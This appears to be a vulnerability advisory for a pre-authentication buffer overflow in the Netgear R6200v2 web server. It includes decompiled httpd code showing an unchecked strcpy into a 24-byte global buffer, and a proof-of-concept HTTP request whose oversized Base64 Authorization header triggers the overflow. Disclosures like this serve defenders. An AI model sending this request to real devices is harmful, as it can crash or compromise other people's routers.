Description
A pre-authentication global buffer overflow vulnerability exists in the web server component of the Netgear R6200v2 router. The issue resides within the sub_ED50 function during the processing of HTTP Authorization headers. The server extracts the Base64-encoded authentication string and performs an in-place decoding via the base64decode utility, which lacks boundary checks. Subsequently, the decoded username is copied into a fixed-size 24-byte global buffer (byte_254FFC) using the unsafe strcpy function. By providing a specially crafted credentials string, an unauthenticated attacker can overflow this buffer to overwrite adjacent critical variables and pointers in the .bss segment, such as the dword_255020 URL pointer. This memory corruption can be leveraged to achieve arbitrary code execution or cause a denial-of-service condition on the affected device.
/* Vulnerability Location: sub_ED50 in httpd */
// 1. Taint Source: Extracting the Base64 encoded credentials from the Authorization header
v43 = stristr(v18, "Authorization: Basic ");
v39 = v43 + 21;
// 2. Unsafe Transformation: Decoding the taint without any length or boundary checks
base64decode(v39);
// 3. Taint Separation: Locating the colon separator to isolate the username
v46 = strchr(v39, 58); // Find ':' (ASCII 58)
if ( v46 )
{
*v46 = 0; // Null-terminate the username part
// 4. Vulnerable Sink: Unsafe strcpy into a fixed-size global buffer
// byte_254FFC is allocated only 24 bytes (0x18) in the .bss segment
strcpy(byte_254FFC, v39);
}
POC
GET /start.htm HTTP/1.1
Host: 192.168.1.1
Cache-Control: max-age=0
Authorization: Basic YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhOmJiYmJiYmJiYg==
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.1/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive